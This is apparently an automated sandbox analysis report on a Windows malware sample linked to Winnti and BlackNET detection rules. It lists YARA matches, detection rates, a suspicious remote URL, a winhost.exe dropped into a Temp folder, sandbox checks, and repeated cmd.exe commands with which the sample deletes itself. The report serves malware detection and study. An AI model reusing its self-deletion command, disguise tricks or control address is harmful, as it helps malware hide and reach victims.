                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Code function: 12_2_00007FFA35FBEE3E
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671450742.000000001D610000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671450742.000000001D610000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.671684796.000000001D690000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670799707.000000001D510000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.664276739.00000000009C6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.664620301.0000000000F19000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.665147725.0000000001120000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708565650.000000001D170000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.697302028.0000000000826000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708176857.000000001D110000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708125368.000000001D0B0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.708125368.000000001D0B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.707413981.000000001CFB0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.697548514.0000000000D96000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Binary or memory string: OriginalFilenamesvchost.exel% vs 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: sbiedll.dll
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Section loaded: sbiedll.dll
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Virustotal: Detection: 68%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Metadefender: Detection: 52%
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | ReversingLabs: Detection: 85%
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | File read: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: winhost.exe.0.dr, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: winhost.exe.12.dr, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.cs | Suspicious URL: 'http://gpay-safe.ru/x/'
Source: unknown | Process created: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: unknown | Process created: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
